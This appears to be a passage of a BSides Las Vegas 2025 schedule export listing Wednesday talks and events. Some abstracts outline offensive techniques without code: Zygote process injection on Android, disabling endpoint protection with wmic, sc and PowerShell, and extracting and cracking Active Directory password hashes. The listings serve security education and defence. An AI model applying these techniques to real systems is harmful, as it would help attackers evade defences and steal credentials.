tool or a way to educate others on how to conduct these attacks and emphasize the importance of studying this technique deeply. Reference Projects: Riru - https://github.com/RikkaApps/Riru Zygisk - https://github.com/topjohnwu/Magisk ARTDroid - https://github.com/vaioco/ARTDroid Yaga project will be released on beginning of June! I will put a PoC here to give an idea what is coming, on the video I show the installation of Magisk module and a log message showing the injection was performed successfully coming from Zygote process and making it print process names: https://drive.google.com/file/d/1U3WYDDI5KS2B-uGUdYTdpgKkHIhKJnkK/view?usp=sharing The project will be released on my GitHub: https://github.com/Tricta PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/YGNSNC/ Florentine A Tricta PUBLISH ZSU7J8@@pretalx.com -ZSU7J8 The Two Types of Fool - Generations in Cybersecurity en en 20250806T120000 20250806T124500 004500

The Two Types of Fool - Generations in Cybersecurity

Keynote, Wednesday PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/ZSU7J8/ Florentine A Casey John Ellis PUBLISH HWGE3E@@pretalx.com -HWGE3E Closing Ceremony en en 20250806T130000 010000

Closing Ceremony

Closing Ceremony PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/HWGE3E/ Florentine A milqtst PUBLISH 7YTJNV@@pretalx.com -7YTJNV Hire Ground Resume Reviews, Wednesday Morning en en 20250806T100000 20250806T115500 015500

Hire Ground Resume Reviews, Wednesday Morning

Free resume reviews in Hire Ground. PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/7YTJNV/ Florentine B PUBLISH RUSV93@@pretalx.com -RUSV93 Silent Auction Opens, Wednesday en en 20250806T083000 20250806T083000 000000

Silent Auction Opens, Wednesday

Silent Auction Opens PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/RUSV93/ Florentine C+D PUBLISH B7AYTL@@pretalx.com -B7AYTL Middle Ground Opens, Wednesday en en 20250806T083000 000000

Middle Ground Opens, Wednesday

Middle Ground Opens, Wednesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/B7AYTL/ Florentine C+D PUBLISH LLYXAP@@pretalx.com -LLYXAP Morning Talks, Wednesday en en 20250806T100000 020000

Morning Talks, Wednesday

Morning Talks, Wednesday PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/LLYXAP/ Florentine C+D PUBLISH XYBGFV@@pretalx.com -XYBGFV Silent Auction Closes, Wednesday en en 20250806T110000 20250806T110000 000000

Silent Auction Closes, Wednesday

Silent Auction Closes PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/XYBGFV/ Florentine C+D PUBLISH NWHBU3@@pretalx.com -NWHBU3 Middle Ground Closes, Wednesday en en 20250806T140000 20250806T140000 000000

Middle Ground Closes, Wednesday

Middle Ground Closes, Wednesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/NWHBU3/ Florentine C+D PUBLISH S3QCRP@@pretalx.com -S3QCRP Hardening Containers with Seccomp: Hands-On Profiles, Pitfalls, and Real Exploits en en 20250806T100000 20250806T104500 004500

Hardening Containers with Seccomp: Hands-On Profiles, Pitfalls, and Real Exploits

Containers have transformed how we build and deploy applications, but the attack surface at runtime remains dangerously exposed in many environments. Seccomp, Linux’s built-in syscall filtering mechanism, offers a powerful way to reduce that surface, but it’s often seen as too painful or risky to apply in production. This talk takes a practical, hands-on approach to solving that. We'll start by grounding the audience in what seccomp is, why it's critical for modern container security, and where profiles and the ecosystem fall short. From there, we'll dive into live demonstrations: showing how to monitor actual container behavior, generate tailored seccomp profiles using open-source tools like Kubescape, and deploy these profiles effectively within Kubernetes environments. We'll walk through a real-world vulnerable application (Apache Druid) and demonstrate a remote code execution exploit inside a container. Then, using a generated seccomp profile, we'll block the attacker’s execution path live, without changing the application code. Along the way, we’ll tackle real operational pitfalls: handling noisy apps, evolving profiles with your software lifecycle, and keeping the dev team moving without constant breakages. Attendees will leave with precise, repeatable techniques for using syscall filtering to harden their workloads against real-world attacks and a realistic sense of the strengths and limitations of seccomp as a defense-in-depth strategy. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/S3QCRP/ Florentine E Ben Hirschberg PUBLISH 78QXVQ@@pretalx.com -78QXVQ Russian Nesting Dolls: when Turla got into the ISI who was into an Indian Embassy, and how we found them en en 20250806T110000 20250806T114500 004500

Russian Nesting Dolls: when Turla got into the ISI who was into an Indian Embassy, and how we found them

This talk came from research that took place over the course of a year, but the overall scope of activity had been going on for roughly 3 years. We originally got on the trail of a ReverseRAT sample and developed analytics that allowed us to enumerate the C2s being used by Sidecopy. Soon we found some interesting aspects that led us down the rabbit hole. The first of which was the Hak5 device that communicated with those Pakistani C2s from inside an Indian Embassy in Europe. This was our first sign of something very interesting, as we don't see that every day. We'll talk about how that was identified and of course we can speculate on how a physical device got in there, but as interesting as it is, that's a story we can only guess at. In this case, they were clearly going after some of their more strategic objectives, breaking into the Indian government and those of their neighbors in Afghanistan, while keeping tabs on the government in Syria during the conflict there. Where things got even more interesting is how pivoting off those original ISI C2s, led us to Turla. Given the international climate over the last few years, Turla was of special interest to us. Turla is infamous for using old-school spycraft to camouflage their activities by working through other's infrastructure and appearing to be anything other than what they are. While we can expect them to stay true to their core techniques in the future, our reporting has changed some of their activities and we'll include that in the talk. The talk will chart the connections of the ISI into their targets, as well as those of Turla into the ISI and downstream in each direction. We'll be using slides to show the scope of activity, and to describe the tradecraft and tools used by both parties. We'll also go over some of the indicators that defenders can use to help identify tendencies that reveal these threat actors. And of course, we'll have some memes along the way. Probably some dogs in there for good measure. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/78QXVQ/ Florentine E Danny Adamitis PUBLISH ZNXL8D@@pretalx.com -ZNXL8D UNION SELECT * FROM hackers: Why We Should Be Building InfoSec Worker Power Through the Labor Movement en en 20250806T100000 20250806T104500 004500

UNION SELECT * FROM hackers: Why We Should Be Building InfoSec Worker Power Through the Labor Movement

In recent years, there has been high-level talk within the InfoSec community about the role for organized labor in the community but with no active stakeholders "from labor" or practical InfoSec worker organizing experience present (see Cory Doctorow's DEF CON 32 talk, the White House's Cybersecurity Workforce Strategy, etc.). Similarly, in the tech worker space, I've noticed very little attention given explicitly to InfoSec workers and the unique considerations that apply to our community and industry. I am mildly frustrated by this discrepancy, particularly since I've been involved with the labor movement long before I ever wrote my first "Hello World" program. It’s also a discrepancy ripe with opportunity, as many of the skills and values that define the InfoSec community are directly applicable to labor organizing. This talk is my attempt to start remediating the situation by making the pitch for unions and broader labor movement organizing to the InfoSec community as a member of both this community and the labor movement. Initially, I waited to pitch this talk to Hacker Summer Camp until I could find a coalition of other unionized InfoSec professionals, or until I had buy-in from other parts of the labor movement that may be able to process any increased interest generated by this talk. However, the recent deterioration of the community's soft power policy influence and heightened attacks on the labor movement convinced me of the urgency of giving this talk this year. This talk builds on arguments on the need for and utility of tech sector unions made by Cory Doctorow, Ethan Marcotte, the Tech Workers Coalition, various tech unions, grassroots organizers, and others. I tailor those general arguments towards the InfoSec community and industry to stress the relevance of organized labor as one of the best tools this community has to build power and influence people as we lose the voluntary deference, particularly as individuals, we received from our bosses and the government in the past. This talk goes beyond a few words on how "you should unionize your workplace!" and provides an in-depth discussion on why building collective power as workers is more important now than ever, shows how it has worked in ways other forms of organizing cannot, and provides practical insight from the perspective of someone who actively represents developers, incident responders, analysts, auditors, cloud engineers, etc. when I'm not in a terminal or VSCode. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/ZNXL8D/ Florentine F Logan Arkema PUBLISH 9WYQKB@@pretalx.com -9WYQKB Breaking the Illusion: Bypassing Endpoint Security Controls with Simple Tactics en en 20250806T110000 20250806T114500 004500

Breaking the Illusion: Bypassing Endpoint Security Controls with Simple Tactics

At BSidesLV, we will unveil previously undisclosed vulnerabilities affecting Microsoft Defender and Zscaler—flaws currently being triaged by Microsoft and coordinated with US-CERT. These vulnerabilities expose critical weaknesses in how endpoint and network security solutions enforce protection and prevent tampering. But beyond new vulnerabilities, this talk will demonstrate how EDR solutions can be bypassed using built-in OS functionality, overlooked misconfigurations, and flawed integrity protections—no exploits, no malware, just simple, repeatable techniques that adversaries are already using. Organizations often assume that EDR is resilient—that once deployed, it provides a reliable defense against attackers. But what happens when an adversary removes, disables, or renders it ineffective using nothing more than tools already available on the system? We will walk through real-world examples of how: Scripts found in the wild silently bypass endpoint security uninstallation logic. EDR solutions fail to enforce self-protection, allowing simple tampering techniques. Native Windows tools like wmic, sc, and PowerShell can be abused to disable or remove security software. Newly discovered vulnerabilities in Defender and Zscaler can be exploited to weaken security controls. This talk will include exclusive first-time disclosures of new security weaknesses alongside live demonstrations of real-world security bypasses that work today. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/9WYQKB/ Florentine F Blake Hudson Caleb Sargent PUBLISH ZUWAF8@@pretalx.com -ZUWAF8 Password ~Audit~ Cracking in AD: The Fun Part of Compliance en en 20250806T100000 20250806T104500 004500

Password ~Audit~ Cracking in AD: The Fun Part of Compliance

To begin, we will present the latest NIST recommendation for passwords and the risks and benefits of implementing them. We will also present our 3 corporations (with AI generated icon style images) (~5 mins) We will then jump in the heart of the subject. **Attack 1**: Password Spray We will present stats about breach that starts with Brute Force/PassSpray attacks We'll see how YOLO Corp falls from an exposed RDP service to a ransomware scenario VS CoolSec who was able to both detect the attack and resist the PassSpray Attacks because they audits their passwords and eliminates the common one (~ 5 mins) **Attack 2**: Evils gets a copy of NTDS.dit from an unprotected backup from YOLO Corp & CoolSec They attempt cracking the passwords. Typically that'll get over 50% of the password within a few days and some will fall in seconds (anything that has 7 characters long) We will then see that dumping NTDS.dit from your DC to perform Password Audit isn't the most elegant way to go about it. Fortunately Michael Grafnetter's DSInternals got us covered. This Open Source PowerShell project will pull the information for the DC (just like the DCSync attack) and will perform some basic analysis of the hashes found. We will go over the main modules of this project and how to configure a user that can fetch the hashes. And finally how to detect this type of activity if another user (or if that account ever gets compromised!!) ever perform a similar action (~15 mins) From there it's also easy (built-in command) to convert the user & hash to a format John the Ripper or Hashcat can ingest for additional cracking. We will go over some effective password cracking rules and methodology for Hashcat and reference Travis Palmer's Defcon 28 Red Team Village talk "Passwd Cracking Beyond 15 Chars, Under $500" Using either Password Filter or Azure AD "ban list" we can prevent users from choosing derivatives of these weak passwords in the future (~10 mins) In conclusion we'll cover how once you have DSInternals & Hashcat in place, it's easy to create a wrapper script to automate the whole process : - Extract the hashes - Run a few check on hashes (without cracking) - Any previously cracked hash present - Any hash associated with multiple accounts - Etc. - Launch a Password cracker against the account - Force change password on accounts with "known passwords" - Send a communication to the account's owner. (~5 mins) After attending this talk the attendees should leave the room with knowledge about the latest NIST recommendation for passwords and a plan to enforce them while making sure their users are not using weak passwords and putting the whole enterprise at risk. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/ZUWAF8/ Tuscany Mat Saulnier PUBLISH BWUGRH@@pretalx.com -BWUGRH Password Expiry is Dead: Real-World Metrics on What Rotation Actually Achieves en en 20250806T110000 20250806T112000 002000

Password Expiry is Dead: Real-World Metrics on What Rotation Actually Achieves

Our talk debunks the myth that routine password expiration improves security. Many audit outcomes and recommendations given push for password expiration as a way to prevent attacks. Using historical and real cracked password data, we show how forced rotations lead to predictable patterns and weaker passwords — not stronger ones. And propose smarter, risk-based alternatives to legacy policies. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/BWUGRH/ Tuscany Dimitri Fousekis PUBLISH RGNJER@@pretalx.com -RGNJER Root Cause and Attack Flows: Interpretable ML for Alert & Log Correlation en en 20250806T100000 20250806T104500 004500

Root Cause and Attack Flows: Interpretable ML for Alert & Log Correlation

This talk introduces an open-source approach to alert correlation and attack flow reconstruction using interpretable machine learning—not LLMs or black-box AI. Designed for SOC analysts and defenders, the presentation walks through how to map logs and alerts to MITRE ATT&CK techniques, cluster them into meaningful stages, and chain those stages into full attack narratives. The goal is to expose coordinated attacks that hide within fragmented telemetry, false positives, and lone incidents. Attendees will learn how to apply context-driven techniques—like density-based clustering, temporal graph modeling, and simple NLP classifiers—to turn noisy data into actionable insight. We’ll demonstrate how the Attack Flow Detector tool performs this work in real-world-style environments, outputting root cause analysis and ticket-ready reports. The talk emphasizes transparency, explainability, and practicality—giving hackers and blue teamers a framework to trace attacker movement through data they already have, without needing search-heavy SIEMs or opaque AI platforms. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/RGNJER/ Siena Ezz Tahoun PUBLISH 9CCKBA@@pretalx.com -9CCKBA A Winning Competition en en 20250806T110000 20250806T112000 002000

A Winning Competition

As new security challenges arise, hands-on competitions are vital for training the next generation of defenders and responders. Collegiate cyber competitions like WRCCDC and CIRCUS serve dual roles: they test students’ technical skills under pressure and expose them to real-world operational and legal contexts. WRCCDC places teams in the role of network administrators defending “commercial” infrastructure against persistent red-team attacks, while CIRCUS challenges participants to perform deep forensic analysis and defend findings before legal professionals. This talk will go over operation insight and technical challenges in running different structured competitions. You will gain insights into competition architecture, work involved in creating realistic scenarios, custom software development work, scoring mechanisms, red-team integration, and team development strategies that foster collaboration and technical proficiency. We’ll also delve into role assignment (e.g., network, system, application, forensics, reporting), and training regimens, culminating in a blueprint for both organizers and competitors. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/9CCKBA/ Siena Wasabi PUBLISH AWLR99@@pretalx.com -AWLR99 Manufacturing Breakthroughs: How Conflict Leads to Innovation en en 20250806T113000 20250806T115000 002000

Manufacturing Breakthroughs: How Conflict Leads to Innovation

Cybersecurity is a field filled with contradictions: how do we balance security with openness, privacy with functionality, or resilience with complexity? TRIZ (Theory of Inventive Problem Solving) offers a roadmap for navigating these dilemmas systematically. Originally developed in engineering, TRIZ is a structured methodology that helps identify existing solutions to seemingly unsolvable problems by resolving contradictions and leveraging patterns of innovation. Think of TRIZ as a GPS for problem-solving. The contradiction matrix acts as a “decision tree for conflicts,” guiding professionals to resolutions without compromise. Patterns of evolution serve as “forecasting the weather in technology,” enabling organizations to anticipate future risks and opportunities based on predictable progressions. This talk focuses on applying TRIZ principles to three critical domains in cybersecurity: supply chain security, dark web economies, and critical infrastructure resilience. Using vivid case studies—such as anti-phishing strategies that leverage contradiction resolution techniques or data leakage prevention through segmentation—attendees will see how TRIZ can transform their approach to problem-solving. By the end of this session, participants will understand how to integrate TRIZ into their analytical processes, empowering them to anticipate threats, minimize surprises, and design resilient systems that adapt dynamically to emerging challenges. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/AWLR99/ Siena Munish Walther-Puri PUBLISH GAYADE@@pretalx.com -GAYADE NA en en 20250806T100000 20250806T103000 003000

NA

NA PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/GAYADE/ Copa NA PUBLISH MQCNWH@@pretalx.com -MQCNWH Neighborhood & Household Resilience- A Month Without External Assistance. en en 20250806T103000 20250806T110000 003000

Neighborhood & Household Resilience- A Month Without External Assistance.

This panel will discuss approaches to maintaining a one-month supply of food, water, and medicine per household member to ensure self-sufficiency during extreme emergencies. Such events—ranging from hurricanes and earthquakes to cyberattacks and pandemics—can disrupt supply chains, utilities, and emergency services, leaving communities isolated and vulnerable. David will be joined by some guests to talk about the art of the possible as it relates to maintaining resilience within the home and community. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/MQCNWH/ Copa David Batz PUBLISH WFYFWE@@pretalx.com -WFYFWE Time is Running Out - Tying it All Together - What Will You Do in the Near Term? en en 20250806T110000 20250806T120000 010000

Time is Running Out - Tying it All Together - What Will You Do in the Near Term?

This portion of the event is focused on no-kidding short-term measures to take to reduce risk. We have discussed water, urgent and emergency care, energy, public safety, and household resilience. What actions can you take this month to protect your community, your family, yourself? What about next month? What about October? Ongoing, incremental steps can materially reduce risk. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/WFYFWE/ Copa Josh Corman PUBLISH PFRLVK@@pretalx.com -PFRLVK BSides Pool Party en en 20250806T210000 20250807T030000 060000

BSides Pool Party

BSides Pool Party PUBLIC CONFIRMED Event6HR https://pretalx.com/security-bsides-las-vegas-2025/talk/PFRLVK/ Pool PUBLISH D83EH8@@pretalx.com -D83EH8 Recovery Hackers, Wednesday en en 20250806T193000 20250806T213000 020000

Recovery Hackers, Wednesday

Not a formal 12-step meeting. Rather, a supportive gathering for folks taking Summer Camp one day at a time. Monday, Tuesday and Wednesday, 19:30-21:30 in G103. Look for the sign on a patio on the pool side of building G and enter through the patio door. PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/D83EH8/ G-103 PUBLISH NZA8EH@@pretalx.com -NZA8EH Info Booth Opens, Wednesday en en 20250806T070000 000000

Info Booth Opens, Wednesday

Info Booth Opens, Wednesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/NZA8EH/ Hallway PUBLISH UJBZWE@@pretalx.com -UJBZWE Registration Opens, Wednesday en en 20250806T080000 000000

Registration Opens, Wednesday

Registration Opens, Wednesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/UJBZWE/ Hallway PUBLISH CMTLQN@@pretalx.com -CMTLQN Skytalks Token Drop 5 en en 20250806T090000 20250806T100000 010000

Skytalks Token Drop 5

Skytalks Token Drop 5 Skytalks token distribution for Wednesday MORNING sessions (10:00-12:00) Queue in Tuscany Hallway between Middle Ground and Speaker Room. Tokens are limited in number, and distribution ends when they are gone. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/CMTLQN/ Hallway PUBLISH DLKXPU@@pretalx.com -DLKXPU Registration Closes, Wednesday en en 20250806T110000 20250806T110000 000000

Registration Closes, Wednesday

Registration Closes, Wednesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/DLKXPU/ Hallway PUBLISH BPC3MD@@pretalx.com -BPC3MD Info Booth Closes, Wednesday en en 20250806T160000 20250806T160000 000000

Info Booth Closes, Wednesday

Info Booth Closes, Wednesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/BPC3MD/ Hallway PUBLISH MEGNEQ@@pretalx.com -MEGNEQ Advanced BioTerrorism Methods for the Discerning Practitioner (Token 13) en en 20250806T100000 20250806T114500 014500

Advanced BioTerrorism Methods for the Discerning Practitioner (Token 13)

n/a PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/MEGNEQ/ Misora Dr. Mixael S. Laufer